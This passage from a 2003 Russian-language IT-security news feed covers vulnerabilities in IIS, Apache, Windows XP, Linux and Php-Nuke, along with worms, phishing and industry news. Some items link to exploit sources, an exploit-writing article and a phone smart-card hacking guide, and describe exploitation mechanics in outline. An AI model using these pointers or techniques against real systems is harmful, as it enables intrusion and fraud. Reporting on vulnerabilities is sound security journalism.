набора мастеров. NSELib существует в версиях для сред разработки Microsoft Visual C++ и Borland Delphi. Цена пакета составляет 799 долл. США. Подробности - http://www.vnunet.com/News/1141296
5/06/2003 10:01 Конгресс США пытается побороть спам.
В настоящее время в Конгрессе США обсуждаются несколько вариантов законодательства, направленного на борьбу со спамом. Как полагают законотворцы, авторы несанкционированных рассылок должны идентифицировать себя, кроме того, нужны четкие механизмы, позволяющие получателям спама отказаться от получения подобной информации в будущем. Однако нет гарантии, что даже если подобное законодательство будет принято, оно сможет разрешить проблему. Один проект предусматривает, что авторы рассылок должны указать свой точный адрес и иные реквизиты. Однако злоумышленники могут легко создавать фантомные обратные адреса, формально соблюдая требование о самоидентификации. Другое предложение заключается в идее создания особого электронного портала, который бы собирал информацию о спамерах (ее должны будут передавать получатели несанкционированных писем), анализировал ее и, при получении доказательств о нарушении правил рассылки, передавал бы эту информацию в суд. Однако стоимость создания подобного портала может быть фантастически высокой, и на его разработку могут уйти годы. При этом нет гарантий, что подобная система действительно будет работать. Третий вариант предлагает создать особую базу данных, куда пользователи могли бы вносить адреса своей электронной почты, чтобы сообщить, что на эти адреса не должны приходить посторонние послания. Однако даже теоретически трудно представить, что к этой базе получат доступ все отправители несанкционированных писем: спам рассылают миллионы компаний, религиозных, благотворительных организаций и частных лиц. Четвертая идея заключается в том, чтобы запретить спамерам использовать фальшивые темы письма, не относящиеся к содержанию (например, письмо, содержащее рекламу, может иметь тему "Привет от старого друга") и запретить использовать программы, скачивающие адреса электронной почты с серверов. Однако крайне трудно доказать, что тема письма, неправильно отражающая его содержание, или использование того или иного программного обеспечения может являться правонарушением. Подробности - http://www.cnews.ru/newtop/index.shtml?2003/06/04/144927
4/06/2003 15:04 Телефонные смарт-карты города Мурманска.
Полное руководство по взлому, эмуляции итд этих чип-карт города Мурманска в формате PDF. Руководство - http://xggav.hotbox.ru/murmcard.pdf
4/06/2003 13:01 Основные типы атак, применявшиеся хакерами во 2 квартале 2003 г.
Каждый квартал Координационный Центр CERT, находящийся под крылом университета Карнэги-Мэллона (Питтсбург, США), публикует отчёт, в котором описываются основные уязвимости, атаки на которые проводились наиболее часто хакерами (зарегистрированные атаки, естественно). 3 июня опубликован очередной (второй за этот год) подобный отчёт CS-2003-02. Как следует из отчёта, наиболее часто атакам подвергались уязвимости следующего типа: 1. Целочисленное переполнение в подпрограме бибилиотеки XDR в SUN RPC (удалённый вызов процедур). 2. Многочисленные уязвимости в Lotus Notes и Domino. 3. Переполнение буфера в sendmail. 4. Множестенные уязвимости в препрпоцессоре snort. Подробнее - http://www.cert.org/summaries/CS-2003-02.html
4/06/2003 12:20 Как побороть уязвимость в ядре Linux.
Как мы сообщали ранее, в ядре Linux была обнаружена уязвимость, которая проявляется при сборке фрагментированных сетевых пакетов. Это может позволить удалённому атакующему вызвать DoS хоста под управлением Linux из-за многочисленных коллизий кэша маршрутизации. Florian Weimer советует в качестве временной меры противодействия ограничить "толщину" сетевого канала при помощи iptables, либо ументшить количество выделяемого кэша на уровне ядра при помощи файловой системы /proc, для чего выставить: # echo 4096 > /proc/sys/net/ipv4/route/max_size # echo 2048 > /proc/sys/net/ipv4/route/gc_thresh. Необходимо заметить, что при этом, однако, что уменьшение кэша маршрутизации может негативно сказаться на сетевой продуктивности. RedHat, Connectiva и EnGarde выпустили обновления для своих дистрибутивов. Подробности - http://www.securityfocus.com/bid/7601/solution/
4/06/2003 11:17 Microsoft усовершенствует систему патчей.
Microsoft пойдет по пути повышения безопасности ПО, для чего реорганизует систему управления поправками к программам и вступает в партнерские отношения с VeriSign в сфере аутентификации пользователей веб-сервисов. Во вторник компания пообещала усовершенствовать свою систему рассылки секьюрити-патчей для существующих продуктов. По словам директора Microsoft по стратегии trustworthy computing Скотта Чарни, выступившего на конференции TechEd в Далласе, 95% атак происходит после выпуска поправки к известному пробелу в защите программы. К концу года компания намерена уменьшить количество способов рассылки патчей заказчикам с восьми до двух. Одна из двух новых систем предназначена для внесения изменений в операционную систему Windows, а другая — в бизнес-приложения Microsoft. Со временем компания сосредоточит все управление поправками в едином инструменте, способном работать со всеми продуктами Microsoft. Кроме того, Microsoft планирует обеспечить автоматическое внесение поправок в Windows через внутренний реестр, а не через разные части операционной системы. Такая согласованность и регистрация всех патчей, присутствующих в ПО, должны повысить вероятность их правильной установки. Подробности - http://zdnet.com.com/2100-1104_2-1012689.html
4/06/2003 10:45 Microsoft выпустила пакет Exchange 2003 RC1.
Корпорация Microsoft объявила о выпуске первого релиз-кандидата почтового сервера Exchange 2003 RC1. Это означает, что и выход окончательной версии данного продукта не за горами. Exchange 2003 будет выпущен в двух вариантах: Standard для малого и среднего бизнеса и Enterprise для крупных корпоративных клиентов. Выпуск Exchange 2003 станет очень важным событием, поскольку это единственный почтовый сервер Microsoft, совместимый с новой ОС Windows Server 2003. Более ранние версии Exchange в этой ОС не работают. Релиз-кандидат Exchange 2003 можно скачать с сайта Microsoft бесплатно. После выхода окончательной версии пользователи Exchange 2003 RC1 могут обновить ее до полной на льготных условиях. Источник - http://www.compulenta.ru
4/06/2003 10:12 В Kazaa больше не будет троянских модулей.
В конце мая компания Sharman Networks опубликовала на сайте пиринговой сети Kazaa заявление, в котором указала, что в одноименный файлообменный клиент не будут включаться шпионские модули, собирающие информацию о деятельности пользователя. Обвинения в том, что в Kazaa включаются шпионские программы, звучали прежде неоднократно. Из-за этого, в частности, временно было прекращено распространение файлообменного клиента на популярном сайте Cnet Download. Как утверждается в заявлении Sharman Networks, Kazaa Media Desktop - бесплатная программа, расходы на поддержку которой окупаются законными методами, а именно распространением контента с соблюдением авторских прав, размещением рекламы и с помощью двух рекламных модулей сторонних производителей. Подробности - http://www.kazaa.com/us/privacy/nospyware_policy.htm
4/06/2003 09:02 "Sobig.c": спамерские технологии на службе вирусописателей?
В Рунете появилась очередная, третья, версия червя Sobig. В мае этот червь стал самой распространенной вредоносной программой, так что «популярность» его предыдущих версий, особенно Sobig.b, также известной как Palyh, обещает возможность возникновения очередной крупномасштабной эпидемии. На данный момент «Лабораторией Касперского» зарегистрировано большое количество случаев заражений. По словам руководителя антивирусных исследований «Лаборатории Касперского» Евгения Касперского, у компании есть основания полагать, что в данном случае вирусописатель использовал спамерские технологии для проведения массовой анонимной рассылки червя, поскольку встроенная в Sobig функция распространения недостаточно эффективна, чтобы вызвать такое большое количество заражений. Sobig распространяется по электронной почте в виде вложенных файлов и по ресурсам локальной сети, создавая свои копии на открытых дисках. Для почтовой рассылки он сканирует файлы зараженного компьютера, находит в них адреса и незаметно посылает на них свои копии. Чтобы заставить пользователя запустить свой файл-носитель, червь использует разнообразные методы социального инжиниринга, в частности, маскируясь под письма от технической поддержки Microsoft. Среди побочных действий Sobig - возможность загрузки и установки с удаленных веб-серверов на зараженный компьютер обновленных версий червя или внедрения в систему программы-шпиона. Примечательно, что в код червей Sobig двух последних версий заложен временной триггер. Если системная дата зараженного Sobig.b компьютера превосходит 31 мая, то червь автоматически отключает все свои функции за исключением загрузки дополнительных файлов. Источник - http://www.kaspersky.ru
3/06/2003 18:19 Уязвимость в Windows XP.
Сообщается о наличии уязвимости в операционной системе Windows XP Professional SP1. Связана она с библиотекой ntdll.dll - являющейся корневым элементом Windows ОС, построенных на ядре NT. Сама природа уязвимости связана с функцией 'RtlGetFullPathName_U', входящей в состав библиотеки. Эта функция используется для передачи полного пути к буферу ядру. Обычно вызывается из API 'GetFullPathNameW' и др. Для обработки строки, предствляющей собой путь используется структура 'UNICODE_STRING' внутри функции. Однако, длина этой строки ограничена 16-битным целым числом (согласно спецификации). При передаче функции строки длиной более 65536 байт происходит переполнение буфера. В результате, атакующий может создать программу, либо сервис, передающий функции (через API) строку длиной более 65536 байт, и, таким образом выполнить произвольный код в системе или повысить свои привилегии в системе. Microsoft выпущен хотфикс 'Q815021', ссылка на который имеется в бюллетене по безопасности MS03-007, выпущенном 28 мая. Подробности - http://archives.neohapsis.com/archives/bugtraq/2003-06/0005.html
3/06/2003 15:00 Описание уязвимости в Apache.
Ранее мы писали о том, что группа разработчиков Apache была вынуждена выпустить версию 2.0.46 ввиду обнаружения уязвимости в текущих версиях Apache ветки 2.0.х. Появилось описание уязвимости от известной компании, занимающейся исследованием безопасности, iDEFENSE. Уязвимость связана с использованием Apache Portable Runtime (APR) - библиотеки структур и подпрограмм, применяемой для обеспечения совместимости Вэб-сервера для многих платформ. Передача очень длинной строки функции библиотеки APR apr_psprintf() приводит к тому, что приложение обращается к областям памяти, которые уже были возвращены куче. При этом возникает вероятность проведения как DoS-атаки, так и возможности выполнения произвольного кода в пространстве памяти процесса, хотя последняя пока не была подтверждена компанией. Существует одно существенное ограничение - удалённый атакующий для осуществления атаки должен быть способен передать эту самую очень длинную строку функции. В качестве вектора атаки был использован модуль Apache mod_dav - был сформирован XML-объект, запрашивающий приблизительно 12250 байт, которые приводили к падению сервера на *NIX-системах, либо 20000 символов для свала сервера на Windows-ОС. Подробности - http://www.idefense.com/advisory/05.30.03.txt
3/06/2003 12:46 Новый тип атак DoS.
Scott A Crosby представил сообществу BUGTRAQ новый тип атак, который может приводить либо к DoS, либо к израсходованию всех ресурсов сервера (рабочей станции) при проведении подобных атак. Природа атаки связана с известными или предсказуемыми алгоритмами хеширования. Специальным образом построив атаку, которая использует небольшое количество данных, позволяет атакующий может вызвать отказ в обслуживании (DoS) в пространстве памяти приложения, использующего подобные алгоритмы хэширования критичных (с точки зрения безопасности) данных. Автором (или авторами) подобный тип атак назван 'Algorithmic Complexity Attack'. Подробное описание уязвимости довольно запутано. Весь смысл атаки сводится к возникновеню коллизий в хэш-таблицах и, в итоге, к неработоспособности приложения. Подробные эксплоиты пока не опубликованы, однако в ссылке, приведённой автором, приведены примеры тестовых файлов, при помощи которых можно проверить уязвимости. Проведение атаки возможно как локально, так и удалённо. Перечень уязвимосго ПО довольно впечатляющ и включаетв себя: Mozilla 1.3.1, DJBDNS 1.05, TCL 8.4.3, GLIB 2.2.1, Python 2.3b1, Perl 5.6.1, Perl 5.8.0, Linux 2.4.20 directory cache (dcache), Squid 2.5STABLE1, Bro IDS 0.8a20. Сообщается также о существовании уязвимости в кэшировании таблицы маршрутов в ядре Linux 2.4.20 - была обнаружена Florian Weimer. В качестве меры противодействия рекомендуется применять менее предсказуемую функцию хэширования, которая называется техникой универсального хэширования. Более подробно - http://www.cs.rice.edu/~scrosby/hash/
3/06/2003 12:31 "МУСОР" убрали оперативно.
Легендарный Джастин Франкель (Justin Frankel), создатель не менее легендарного MP3-проигрывателя Winamp, опять подложил приличных размеров свинью своим начальникам из America Online, опубликовав под лицензией GPL на сайте Nullsoft исполняемые файлы и исходники интересной пиринговой программы WASTE. WASTE, применявшаяся ранее для связи офисов Nullsoft в Сан-Франциско с главными офисами корпорации AOL в Далласе, позволяет группе пользователей создавать частные, зашифрованные обменные сети типа peer-to-peer, дополняет их функциями пейджинга, чата и поиска файлов. Функционально WASTE похожа на сеть Kazaa или ныне мертвый Napster с двумя существенными отличиями: во-первых, размеры одной сети WASTE не могут превышать 50 пользователей; во-вторых, WASTE использует сложные алгоритмы шифрации и авторизации для предотвращения нелегального доступа в свою сеть. Понятно, что свободное распространение подобной программы не могло понравиться владеющей Nullsoft корпорации AOL Time Warner, которой принадлежат сразу несколько "традиционных" звукозаписывающих лейблов, и программа была быстро (в течение суток) убрана с сайта Nullsoft. Однако сутки в интернете - почти вечность Подробности - http://www.viruslist.com/index.html?tnews=1006&id=2380271
3/06/2003 11:28 Sobig - самый назойливый червь мая.
"Лаборатория Касперского" представила свой ежемесячный обзор наиболее распространенных вредоносных программ. По итогам мая самым ?популярным? стал червь Sobig, его доля в общем числе вирусных инцидентов достигла 21,87%. Второе и третье места достались ветеранам рейтинга - Lentin и Klez соответственно. Доля других вредоносных программ, не вошедших в 20 наиболее распространенных, составляет 42,66%. Источник - http://www.kaspersky.ru
3/06/2003 03:32 Microsoft прекращает выпуск Internet Explorer как отдельного приложения
Компания Microsoft заявила, что она прекращает выпуск своего браузера Internet Explorer как отдельного приложения. Отныне все новые версии IE будут встраиваться в Windows и в таком виде будут поставляться пользователям. Последней версией самого популярного браузера в мире, которая распространялась в виде отдельного дистрибутива, стала версия Internet Explorer 6 Service Pack 1. Эта же версия останется самой последней, доступной на всех операционных системах семейства Windows, которые существуют на данный момент. Следующая версия браузера будет встроена в разрабатываемую в данный момент версию Windows Longhorn. Собственно, Microsoft в качестве причины своего шага и называет то, что новые версии браузера будут требовать серьезных изменений в коде операционной системы, а это будет сложно делать чисто технически, распространяя браузер в качестве отдельного приложения. А ведь не так давно за встраивание Internet Explorer в Windows судьи хотели разделить Microsoft на несколько частей. Источник - http://www.3dnews.ru
2/06/2003 12:48 Выход OpenDarwin 6.6.1.
Как стало известно с сайта nixp.ru, вышел OpenDarwin 6.6.1 для архитектур ppc и x86. Новая версия основана на Darwin 6.6 (соответствующий Mac OS X 10.2.6) и выпущена под лицензией APSL. В релиз добавлены обновления из OpenDarwin CVS Repository. Подробности - http://opendarwin.org/en/news.php#26
2/06/2003 12:30 Возможность удалённого выполнения команд в IIS.
И ещё одно описание уязвимости в IIS появилось в BUGTRAQ. Эта уязвимость описана и была устранена в бюллетене от M$ MS03-019. Как утверждается в бюллетене, уязвимость в заключается в некорректном управлении входящими запросами IIS модулем nsiislog.dll. В результате формирования специального запроса сервер падает. Однако, как утверждает Brett Moore из Новой Зеландии, который и оповестил Microsoft об уязвимоисти аж 27 января сего года, уязвимость на самом деле намного серьёзнее - она посзволяет выполнить проивзольный код в констексте эккаунта IWAM_machinename. В результате посылки запроса методом POST, закодированного, как chunked (Transfer-Encoding: chunked) приобретается полный контроль над регистрами EAX и ECX (в результате выполнения инструкции mov dword ptr [ecx],eax). В результате удалённый атакующий получает возможность поместить своё значение в позицию, которая в дальнейшем используется регистром EIP. В результате примения эксплоита, код которого пока автором не опубликован, демонстрируется возможность получения удалённого шелла на IIS-сервере. Подробности - http://archives.neohapsis.com/archives/bugtraq/2003-05/0336.html
2/06/2003 12:08 Возможность подбора паролей пользователей и админов Php-Nuke.
Некий bugsman из Италии описал технологию, которая даёт возможность подобрать хэши паролей как пользователей, так и администраторов Php-Nuke. Для подбора пароля пользователя требуется доступ на уровне пользователя к системе. При помощи спуфленного куки и анализа страницы, выводимой в результате запроса можно по буквам угадать пароль пользователя. В случае с паролем админа для доступа к хэшу вообще не требуется доступ к системе. Используется уязвимость в модуле Web_Links. Анализ угаданной буквы (цифры) пароля также ведётся на сонове анализа результирующей страницы ответа сервера. Автором предложен патч и скрипты на php для анализа наличия уязвимости. Обнаружена в версиях 5.6 - 6.5. Технология использования уязвимости чем-то напоминает известное внедрение SQL-запросов. Подробности - http://archives.neohapsis.com/archives/bugtraq/2003-05/0346.html
2/06/2003 11:46 Разбиение диска для увеличения производительности.
Небольшая статья, описывающая цели использования различных разделов в ОС Linux, а также какие файловые системы на них лучше использовать и какие опции монтирования указывать. Ccылка получена с linux.org.ru. Cтатья - http://freesource.info/article/4.shtml
2/06/2003 11:27 IPv6: китайцы приобщатся первыми?
Еще в начале 90-х годов прошлого века специалисты начали беспокоиться о возможной нехваткеIP-адресов. Сегодня проблема стала актуальной. В мире насчитывается 3 млрд. 700 млн. IP-адресов протокола IPv4. Больше половины адресов уже и спользованы. Такая ситуация не устраивает Китай, где развитие информационных технологий идет особенно бурно. В июне 2002 г. правительства Китая и Японии подписали соглашение о сотрудничестве в области развития протокола IPv6. На разработки в этой области было выделено около $32 млн. Во второмполугодии 2003 г. компания Hitachi планирует развернуть в Китае инфраструктуру, поддерживающую протокол IPv6, и китайские пользователи смогут стать первыми в мире обладателями IP-адресов нового поколения. Источник - http://www.cnews.ru
2/06/2003 10:45 Описание уязвимости в IIS.
Группа исследователей по безопасности NSFOCUS опубликовала описание уязвимости IIS, которая устраняется патчем от Microsoft, описанным в бюллетене MS03-18, выпущенном на прошлой неделе. Суть уязвимости заключается в некорректной обработке передаваемых имён файлов интерпретатором SSI (Server Side Include), представленным библиотекой ssinc.dll. Этот интерпретатор работает с файлами расширений: .stm, .shtm, .shtml. При обращении к файлу при помощи директивы #include его имя сначала копируется в буфер, размер которого фиксирован, однако при этом не проверяется длина имени этого файла. Таким образом, сформировав файл с длинным именем можно вызвать переполнение буфера. Необходимо отметить, что уязвимость носит локальный характер и позволяет повысить свои полномочия в системе. Для проведения атаки необходимо наличие 2-х условий: 1. Атакующий должен иметь полномочия для создания файла в Вэб-директории; 2. Атакующий должен иметь доступ к созданному файлу через Вэб-интерфейс. Примечательно, что об уязвимости M$ было сообщено ещё в ноябре прошлого года. Подробности - http://archives.neohapsis.com/archives/bugtraq/2003-05/0344.html
2/06/2003 09:32 Начат приём статей для PHRACK MAGAZINE.
Командой, выпускающей популярнейший в мире компьютерного андэграунда журнал PHRACK объявлено о начале приёма статей для планируемого к выходу в августе сего года 61 номера. Окончание приёма статей - 18 июля. Как написано в обращении - для публикации в журнале принимаются только статьи очень высокого уровня по тематике: хакинг, фрикинг, реверс-инжиниринг, безопасность и т.д. Полный перечень тем изложен в разделе CFP - Call For Papers. Так что, если кто чувствует себя в силах предложить секьюрити - сообществу что-то новое - обращайтесь. Подробности - http://www.phrack.org/cfp_p61.txt
2/06/2003 09:21 Статья "Win32-buffer/heap overrun conditions или секреты написания эксплоитов".
Возвращаясь к предыдущему эксплоиту, благодаря ребятам из securitylab, была обнаружена статья под названием "Win32-buffer/heap overrun conditions или секреты написания эксплоитов". Как раз в этой статье автор (Alumni) описывает процесс создания эксплоита типа переполнения/перезапуска буфера в win32-cредах. Рассмотрен также вопрос написания шеллкода, где для избежание проблемы терминаторов строк или zero-bytes применено шифрование XOR основной части шелл-кода. Собственно, помимо технолгии написания данную статью можно рассматривать в качестве руководства по применению эксплоита. Статья - http://www.securitylab.ru/?ID=38070
2/06/2003 08:52 Ещё один эксплоит уязвимости в IIS.
Опубликован ещё один эксплоит уязвимости в компоненте WebDAV Вэб-сервера IIS. Написан нашим в какой-то мере соотечественником из Казахстана с ником Alumni. В отличие от предыдущего эксплоита, порождает шелл на порту 32768. Написан также для платформы win32. Эксплоит - http://archives.neohapsis.com/archives/bugtraq/2003-05/0354.html
1/06/2003 17:39 Уязвимость в PC Access Server.
Yaron Tal из израильской компании YTECH сообщает о наличии уязвимости в ПО, выпускаемом Remote Access Software под названием Remote PC Access Server. Это ПО позволяет удалённо управлять компьютером как через Интернет, так и через локальную сеть и относится к программам удалённого администрирования. Позволяет прозрачно работать через файрволлы и роутеры. Было обнаружено, что для проверки наличия соединения между клиентом и сервером используется 12-байтный код авторизации, значение которого предопределено и в его формировании не используется какая-либо случайная функция. Это позволяет удалённому атакующему, использовав технологию подмены IP-адреса (спуффинг), провести DoS-атаку, свалив при этом либо клиента, либо сервер. Производителями ббыла выпущена новая версия - Remote PC Access Server 3.1, в которой устранена эта уязвимость. Автором также выпущен эксплоит для ОС Windows. Подробности - http://www.ytech.co.il/advisories/rpca/rpcaccess.htm
1/06/2003 17:24 Уязвимость в GCC.
Luke Hutchison cообщает об обнаруженной им уязвимости в популярном в мире открытых систем компиляторе gcc. Как выяснил автор, в случае многократного полного копирования стуктур в программе данные из различных структур переписывают друг друга. Как утверждается, это является потенциально опасным с точки зрения безопасности, поскольку позволяет специальным образом сконструированному эксплоиту получить важные системные данные, либо запустить произвольный код (в случае, если стуктура содержит указатель функции). Уязвимость была обнаружена в версиях до 3.2.3. В частности, в составе дистрибутивов Red Hat Linux 8.0 и 9 включены версии gcc - 3.2 и 3.2.2 соответственно. В дереве RawHide Red Hat была выпущена версия v.3.2.3, в которой уязвимости нет. Как пишет сам автор полное копирование структур (implicit struct copying - возможно, это и неявное копирование структур) достаточно редко применяется программистами. Автором выпущен эксплоит, демонстрирующий уязвимость. Подробности - http://archives.neohapsis.com/archives/bugtraq/2003-05/0331.html
1/06/2003 16:47 PayPal атаковали из Литвы.
Не совсем свежая новость, но всё же достойна, на наш взгляд, внимания. Пользователи платежной системы PayPal подверглись атаке. Начиная с прошлого четверга им стали приходить письма с адреса verification@paypal.com и темой сообщения "PayPal Verification" (Проверка PayPal). В письме соообщалось, что PayPal запустил новую систему защиты пользователей и приглашает адресата поскорее зайти и авторизоваться через контактный сайт. В качестве контактного был указан сайт paypal.un-fraud.com, на котором требовалось повторно ввести все данные для авторизации в платежной системе. На фальшивом сайте полностью имитировалось оформление официального сайта PayPal. Специалисты PayPal обнаружили, что сайт был создан неизвестным пользователем из Литвы. По крайней мере туда отправлялась почта с регистрационными данными чересчур доверчивых клиентов. Зарегистрирован же домен и сайт были при помощи аккаунта, украденного ранее в той же платежной системе. Спецалисты PayPal отметили, что попытки похищения пользовательских данных в последнее время участились и преступники идут на самые непредсказуемые ухищрения чтобы обмануть доверчивого юзера. Источник - http://www.newwws.ru/
1/06/2003 16:01 Корпоративные пользователи страдают от хакеров.
Согласно данным опроса Института Компьютерной Безопасности (CSI) 75 процентов компаний подверглись хакерским атакам в прошлом году. Более того, за все время работы в Интернете хотя бы один раз пострадали от хакеров 92 процента компаний. Хакерские вылазки наносят компаниям серьезный финансовый ущерб. Так, например, за прошлый год по оценкам специалистов он составил $455.8 миллионов. К тому же необходимо учитывать, что 47 пострадавших компаний вообще не производили оценку ущерба, сообщает vnunet.com. При этом большая часть атак нацелена не на внутренние корпоративные системы (т.е. интранет), а на публичную часть корпоративных сетей (т.е., собственно, интернет). Источник - http://www.newwws.ru/
1/06/2003 15:32 Выход PHP 4.3.2.
Jani Taskinen от имени команды разработчиков PHP анонсировал выход новой версии этого популярного сериптового языка - 4.3.2. Как следует из описания, в первую очередь устранены очень серьёзные уязвимости, связанные с возможностью целочисленного переполнения и переполнения буфера в предыдущей версии. Устранены баги на 64-битных платформах, улучшена работа модулей SAPI, а также выполнено большое количество других багофиксов. Всем пользователям/администраторам Вэб-серверов настроятельно рекомендуют обновить версию PHP. Подробности - http://www.php.net/ChangeLog-4.php
1/06/2003 14:23 Эксплоит уязвимости в IIS.
Как и следовало ожидать, эксплоит уязвимости, недавно обнаруженной в компоненте WebDAV Вэб-сервера от M$ IIS не заставил себя долго ждать. Написан Shashank Pandey из Индии, носящего "редкий" никнэйм Neo1 (наверное, чтобы отличать от остальных Neo). Написан для платформы win32. При запуске перестартовывает все активные WWW/FTP/SMTP - cоединения, убивая при этом активные. Внутри комментариев исходника - ссылка на описание уязвимости. Исходник - http://packetstorm.linuxsecurity.com/0305-exploits/ne0.c
1/06/2003 14:05 Panda Software сообщает о появлении нового червя Holar.H.
Вирусная Лаборатория компании Panda Software обнаружила появление нового червя Holar.H (W32/Holar.H). Этот вредоносный код быстро распространяется по электронной почте и использует методы «социального инжиниринга» для обмана пользователей. Holar.H является опасным червем, поскольку он способен уничтожить все файлы на зараженном им компьютере. Это происходит после его 30 запуска. Учитывая данный факт, необходимо помнить, что червь запускается при каждом включении компьютера и при каждом запуске зараженного файла. Тема письма, его текст и имя вложенного файла в сообщении, содержащем Holar.H, выбиратся случайным образом из длинного списка возможных комбинаций. Полный список всех возможных параметров приведен на веб сайте компании. Кроме одного из файлов, перечисленных в списке компании, сообщение содержит и еще одно вложение, случайным образом выбираемое на зараженном компьютере. Адрес отправителя, обычно, указывается следующий: Dispatch@McAfee.com. Служба технической поддержки клиентов компании Panda Software получает многочисленные отчеты о случаях заражения данным вредоносным кодом. Наибольшее количество отчетов приходит из Китая, Испании, Израиля и Литвы. Пользователям рекомендуется осторожно обращаться со всей получаемой электронной почтой. Подробности - http://www.viruslab.ru/press/index.php?go=show&num=156
1/06/2003 13:00 Мобильные операторы отключили функцию шифрования.
Основные сотовые операторы РФ на время торжеств, посвященных 300-летию Санкт-Петербурга, отключили функцию шифрования переговоров в своих сетях. Как пояснила "Интерфаксу" пресс-секретарь ОАО "Мобильные телесистемы" (МТС) Ева Прокофьева, "это дополнительная функция, существующая в стандарте GSM, который в этом отношении является самым защищенным стандартом". В ОАО "Вымпелком" сообщили, что "в лицензии каждого оператора есть пункт, в соответствии с которым он должен подчиняться некоторым требованиям спецслужб, в том числе и по отключению шифрования". В ОАО "Мегафон" отметили, что "шифрование было отключено вчера, при этом мы уведомили абонентов через абонентскую службу и сейчас любой пользователь в случае возникновения каких-либо проблем может обратиться туда и получить разъяснения". От себя хтелось бы напомнить, что функция шифрования также была отключена во время известных всем событий на Дубровке. Источник - http://www.internet.ru
1/06/2003 11:53 Глава SCO: Суда над Торвальдсом не будет.
Ещё один интересный поворот в деле "SCO-против UNIX-сообщества". Ранее, согласно информации агентства CBS.MarketWatch, руководство SCO не исключало возможности подачи иска о нарушении патентов против создателя Linux Линуса Торвальдса. Об этом CBS.MarketWatch сообщает со ссылкой на главу SCO Дарла Макбрайда, который упомянул о возможности подачи в суд на Торвальдса, комментируя заявления компании Novell, направленные в защиту Linux. Однако, сам глава компании SCO Дарл Макбрайд опроверг информацию о том, что SCO собирается подавать в суд на создателя ОС Linux Линуса Торвальдса. "Мы не видим никаких причин для этого", - отметил Макбрайд в интервью CNET News. Сам Торвальдс сообщил CNET News, что считает подачу исков против себя бессмыссленной, хотя исключать такого сценария развития событий, по его мнению, никак нельзя. При этом отец Linux призвал своих соратников конструктивно отнестись к происходящему и не совершать необдуманных поступков, например, DoS-атак на сайты SCO. Подробности - http://news.com.com/2100-1016_3-1011263.html)
31/05/2003 18:12 Выпущено кумулятивное обновление базы данных Антивируса Касперского.
"Лаборатория Касперского" сообщает о выпуске очередного кумулятивного обновления базы данных Антивируса Касперского®. Данное обновление предоставляет ряд новых возможностей, среди которых: * Оптимизация процесса сканирования объектов для увеличения производительности антивируса * Добавлена функция проверки файлов, упакованных утилитами сжатия файлов Krypton (v 0.5), Crypt.Bom, UPX (v 1.90), PEncrypt (v 4.0p), Shrinker (v 3.3, 3.4) и FSG (v 1.31) * Усовершенствованы процедуры проверки файлов, упакованных утилитами сжатия XLok и PE_Patch * Исправлены недостатки антивирусного ядра, выявленные со времени выпуска предыдущего кумулятивного обновления Загрузить - http://www.kaspersky.ru/updates.html
31/05/2003 17:19 Сбой в работе МТС в Москве.
В пятницу абоненты ОАО "Мобильные ТелеСистемы" (МТС) в Москве и Московской области испытывали серьёзные трудности со связью. Как сообщили изданию Газета.Ru в МТС, причина отсутствия связи заключается в сбое работы одного из коммутаторов. По сведениям РИА "Новости", в 13 часов 46 минут по московскому времени произошел сбой программного обеспечения в коммутаторе, который обслуживает центр Москвы. После перезагрузки оборудования неполадки были устранены, однако проблемы со связью остались, поскольку абоненты беспрерывно пытались дозвониться. По словам пресс-секретаря МТС, связь отсутствовала у абонентов лишь одного района Москвы, и примерно к 16 часам дня неполадки были устранены. Тем не менее, некоторые абоненты все равно не смогут в ближайшее время воспользоваться своими телефонами из-за перегрузки сети. "Люди начали звонить и перезванивать друг другу", - объяснила сотрудница пресс-службы корреспонденту РИА "Новости". МТС рекомендовала своим абонентам "перерегистрироваться в сети и воздержаться от непрерывных звонков". Общее количество абонентов МТС в Московском регионе составляет около 3,7 млн. человек. Источник - http://www.gazeta.ru
31/05/2003 16:06 Microsoft помирилась с AOL Time Warner.
Компании Microsoft и AOL Time Warner согласились урегулировать миром антимонопольный иск, поданный AOL в 2002 г. В этом иске AOL требовала от Microsoft компенсаций за злоупотребление своим монопольным положением на рынке ОС и в известной браузерной войне, в результате которой браузер Netscape был почти полностью вытеснен редмондским Internet Explorer. По условиям соглашения, Microsoft выплатит AOL Time Warner компенсацию в размере 750 млн. долл. США. Кроме того, AOL получит право бесплатно использовать движок Internet Explorer в своих продуктах, прежде всего, клиенте AOL, в течение семи лет, а Microsoft будет поставлять OEM-сборщикам компьютеров компакт-диски с пробным доступом к AOL в комплекте с Windows. От конфронтации компании перейдут к сотрудничеству. В частности, Microsoft предоставит AOL доступ к бета-версиям новой ОС под кодовым названием Longhorn и будет учитывать замечания AOL при завершении работы над новой версией Windows. Кроме того, AOL получит право на использование в своих мультимедийных продуктах технологии Windows Media 9. Подробности - http://www.compulenta.ru/2003/5/30/39770/
31/05/2003 15:04 F# - функциональный язык программирования от Microsoft.
В настоящее время в лабораториях Microsoft Research ведется разработка еще одного нового языка, названного F#. Этот язык программирования является функциональным, а не более привычным императивным (к императивным относятся, в частности, языки "Си", "Паскаль", "Фортран" и им подобные). Если в императивных языках программа представляет собой набор выполняемых в определенном программистом порядке команд, то функциональная программа представляет из себя совокупность функций. Функции определяются через другие функции или рекурсивно - через самих себя. В процессе выполнения программы, функции получают параметры, вычисляют и возвращают результат, который может использоваться в качестве параметра другой функции. Программируя на функциональном языке, программист не должен описывать порядок вычислений. Ему необходимо просто описать желаемый результат в виде системы функций. Подобный подход, кстати, используется и при выполнении вычислений в электронных таблицах вроде MS Excel. Язык F# основан на одном из наиболее распространенных функциональных языков - Caml. Изменения и дополнения, внесенные разработчиками Microsoft в Caml, касаются, прежде всего, интеграции языка с платформой .Net. Другой важной особенностью F# станет возможность интеграции программ на нем с приложениями, написанными на императивных языках C#, Visual Basic, SML.NET. В результате, к примеру, можно будет использовать библиотеки F# при написании кода на C#, и наоборот. Подробнее - http://research.microsoft.com/projects/ilx/fsharp.htm
31/05/2003 14:00 Система Check Point Next Generation FP-3 получила государственный сертификат.
